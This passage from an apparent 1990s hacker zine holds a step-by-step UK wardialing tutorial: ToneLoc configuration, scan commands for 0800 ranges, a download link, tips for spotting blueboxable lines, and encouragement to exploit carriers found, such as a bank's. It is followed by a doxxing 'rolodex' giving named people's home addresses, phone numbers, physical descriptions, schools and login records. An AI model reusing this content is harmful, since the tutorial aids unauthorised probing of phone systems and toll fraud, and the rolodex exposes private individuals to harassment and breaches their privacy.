place to start wardialing due to the LARGE percentage of businesses who have
carriers located on them, to transfer data from area to area at low cost (only
rental of number). It is also a lot safer to wardial than normal area codes
because you will not be dialing people's houses, so you can dial 0800/0500
numbers at night and not be waking people up (not that I care, it's just that
they might report the wardialing call to BT as a nuisance call).

If you like the idea of Blueboxing then the 0800 89 **** number block will
interest you. As you may already know, this block of numbers acts as the
COUNTRY DIRECT numbers, with some being boxable. From wardialing you will be
able to note which ones are boxable if you listen in to the wardialing
progress, as boxable numbers (CCITT5 Lines) will give a little series of
bleeps when they pick up; these are instantly recognisable and if you hear
this you will know that it is boxable.

Well, that's a basic introduction into the uses of Wardialing in the UK, so
how bout it? Are you ready to step into this world? This is the real deal and
could land you in a lot more trouble than a webpage hack. No doubt most people
reading this will have already delved into wardialing as it is nothing new,
but some newbies to the subject might be a little misguided about the whole
wardialing deal...

#######
ToneLoc
#######

Yes, this is the wardialer that I recommend for wardialing in the UK. It is,
however, one of the most complicated to understand if you have never used it
before, but this section will explain how to use ToneLoc to its full
capabilities and get scanning straight away.
A download URL for ToneLoc is provided in the *URLs* section of this paper. Right, lets get started...We will keep the example simple by using the same variables throughout this section. When you are actually doing your own wardialing you will of course need to change these variables. People who have read the ToneLoc User Docs may find some of this familiar but some people DO NOT realise that the examples in the user docs CAN be interpreted into UK use. For this papers example we are going to scan the 0800 666 *** range which will provide us with 100 results. It is easy to make this scan A LOT bigger but for times sake we are going to look at this example now. Now we have discussed the variables of this example we can get down to using ToneLoc. First of all you need to restart your computer in DOS m0de and enter the ToneLoc directory. The First thing you need to do is to set the CONFIGURATION SETTINGS to what you require. So, open TLCFG.EXE and you will see 6 menus at the top of the screen. The *FILES* menu is used to change any log files that are used in the program. You can edit the names of these log files from this menu but its easiest to keep the names the same, from this menu you can easily see what the function of each .log file is. The *MODEM STRINGS* menu is used to setup the modem sequence for dialing etc. Here is where you need to enter your dialing prefix (0800) so that the program understands our range. The *MODEM OPTIONS* menu is for your modem settings such as Com Port, Baud Rate, IRQ etc. I would recommend setting your baud rate at 19200 even if you have a faster modem, the program (due to being 4 yrs old) doesn't seem to like any baud rate above 19200. The *SCAN OPTIONS* are the options which you may want to change which affect what it happening during the scan. eg. Sound, Wait Delay etc. 
I would recommend the Wait Delay being quite small to make the scan run faster but remember to keep it long enough for lines to pickup and for ToneLoc to register whether the line is a carrier, PBX, VMB, or Normal Line. The *COLORS* menu is just for editing the colors of the program. Nothing major to worry about. And finally, the *QUIT* menu is where you can chose to save or abort changes made to the configuration file. If you have looked through all those menus you will see that there is a lot of different things that you can change and play with and by now, you should know which ones to change to suit your UK Wardialing needs. Now that you should have all the configuration of ToneLoc setup SPECIFICALLY for your scanning needs we can get down to some major wardialing. If it is your first time using ToneLoc you will need to just open TONELOC.EXE and read the stuff it brings up. As you can probably see, there are LOTS of parameters within ToneLoc that can be used when scanning. ToneLoc allows for a lot of user choice which is something that attracts me to using it. For example, you can easily program the number range to scan and the number range to exclude from the scan by just selecting a different parameter. To scan a range of numbers in the 0800 prefix - eg. 0800-666-100 <--> 0800-666-200 the command at the DOS prompt would be :- TONELOC 666-XXX /R:100-200 This would then scan all the numbers between 0800-666-100 and 0800-666-200 and log the results into the log files specified in the *FILES* configuration menu. This is the option I use the most and its the parameter I recommend you get to know well. Next, suppose you want to scan all the numbers between 0800-666-000 and 0800-666-999, but you had already scanned the 0800-666-100/200 section in your last scan. This is where the EXCLUDE parameter comes into use. 
    TONELOC 666-XXX /D:100-200

This would result in you scanning all numbers 0800-666-000 <--> 0800-666-999, excluding 0800-666-100 <--> 0800-666-200. If you look at the ToneLoc User Guide included in tl110.zip you will see this explained as well as lots of other ways to scan.

Another favourite of mine is to use the following command line.

    TONELOC 666-XXX

This will scan 0800-666-000 <---> 0800-666-999 and it will save the results to the data file 666-XXX.dat. You must always remember to have the correct variables added into the Configuration program.

Now that you know the basic and most used parameters of ToneLoc it's time to get wardialing. If you watch a wardialing session you will see that it separately dials each number and tells you what's happening on screen. It will tell you when it finds anything interesting such as a *gasp* Tone, a Carrier or a Voice, and it also appends the results to the log file so you can remember the numbers of interesting stuff and go back and play with them later.

You must remember that the fun does not end at wardialing. A lot of people find wardialing and scanning boring, but I find it one of the more interesting parts of Hacking/Phreaking as you never know when you're going to be lucky enough to jump upon a neat carrier (for a bank, hehe), a PBX or a VMB; the fun starts here. You need to follow all your wardialing findings up and learn how to use what you have found in a way which benefits you, after all isn't that the aim?

#### URLs ####

Below are the necessary URLs to download ToneLoc and maybe find out more information about wardialing in general.

First of all you will NEED a copy of ToneLoc (the wardialer I am recommending):

    http://www.linenoise.org/philez/wardialers/tl110.zip

Now that you have started wardialing in the UK, how about sharing some of your findings or finding people who may help you on your quests and related projects. The Linenoise WWWBoard is a place for this to come to life.
http://www.linenoise.org/wwwboard/ ### End ### Well, thats all the Information that you need to get you going with Wardialing in the UK and using ToneLoc successfully, just be careful and remember that you're responsible if you fuck up, you cannot blame me, the teacher is not to blame. In the near future I would like to c0de a Wardialer specifically for the UK, which would be easy to use, understand and gain successful results from. It is a project that I always keep on the back burner but if enough people wanted to see it, I might bring it foward, let me know... Jf_ <JF@linenoise.org> ������������������������������������������������������������������������������� =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== ������������������������������������������������������������������������������� 1. p0sse.rolodex (mad outdated anyway) : juurigaveitout ������������������������������������������������������������������������������� Alan Wilson (aka. "w1ng") 58 Moon Drive 215-305-8379 <pager> Morrisville, PA 19069 215-736-1863 <voice> Drexel University 215-752-1324 <SCC for his 5E> wing@dunx1.ocs.drexel.edu Known Sites: *.drexel.edu, *.rutgers.edu, *.delphi.com. Short brown hair, brown eyes. Approximately 5'10 130 pounds. Very scrawny appearence. Roughly 19 to 20 years old. Commutes to Drexel University from his home in Morrisville. Computer Science major. Works part time doing Data-Entry. Egomaniacle, novice UNIX experience, short-tempered, hostile and arrogant. Logs: [dunx1.ocs.drexel.edu] Login name: wing In real life: Wong Ing Directory: /home/dunx1/under/wing Shell: /bin/sh Last login Fri Feb 25 19:21 on ttyqf from gandalf.rutgers.edu New mail received Sat Feb 26 12:00:09 1994; unread since Fri Feb 25 19:27:18 1994 No Plan. ______ Don Neumann (aka. 
"peaboy", "speedin") 7340 Hayward Drive 216-656-1912 <voice> Chardon, Ohio 216-650-5181 <data> Known Sites: *.DELPHI.COM, *.MsState.edu, *.wustl.edu 16-17 years of age. Dropped out of his local High School his Senior year. Works part time as a desk clerk at a local motel. He is not attending a college, and presumably has no GED. _____ Steven Dake (aka. "riley" "renegade bit head" "rbh") 1731 North Fairway Flagstaff, Arizona 86011 602-526-9184 <home> North Arizona University (NAU.EDU) Email unknown. Known Sites: herbon.connected.com, *.NAU.EDU, *.CS.UTC.EDU, ballison.extern.ucsd.edu, *.caltech.edu. Appearance unknown. Approximately 20-23 years of age. Computer Science major, second of third year. He lives on campus in the dormitories. His parents reside at the North Fairway address. He often comes out of UTC.EDU and CONNECTED.COM., _____ Greg Perry (aka. "z00m" "digital hitler" "j00" "gary" "Gary Seven") Known Sites: *.cftnet.com _____ Lane Davis Jr. (aka. "merc") Phoenix, Arizona 602- <home> <unlisted> Known Sites: NAU.EDU, indirect.com, internet.com, _____ (aka. "Sciz") Known Sites: *.drexel.edu 6'10 155, very scrawny. Short permed blonde hair, blue or green eyes. Freshman or Sophomore at Drexel University. Lives in a dormitory on campus. Good friends with Alan Wilson. He rides an unregistered Honda Motorcycle. _____ Scott (aka. "X") Known Sites: CAPELLA.CS.UTC.EDU, HOBBES.CS.UTC.EDU, EXPLORER.CS.UTC.EDU. Email: X@capella.cs.utc.edu He attends and apparently administers part(s) of the CS.UTC.EDU school and domain. He has Brown hair, small build, 5'9" tall, about 155 pounds, brown eyes. _____ Chris Fisher (aka. "y", "Y-W1nD0z3") Known Sites: uahcs2.cs.uah.edu, grendel.cs.uah.edu, tycho.cs.uah.edu Email: cfisher@uahcs2.cs.uah.edu Very egomaniacle. Known for harassing CERT in news groups: ] X-News: uqvax comp.security.unix:4675 ] From: crfisher@nyx10.cs.du.edu (I am being repressed.) ] Subject:Cert; my what a witty bunch. 
] Date: Mon, 11 Apr 94 19:52:33 GMT ] Message-ID:<1994Apr11.195233.17351@mnemosyne.cs.du.edu> ] ] Once again cert proves what a great bunch of guys they are. I guess they had ] never heard of gnufinger before...isn't it amazing that some people still ] respect them? Logs: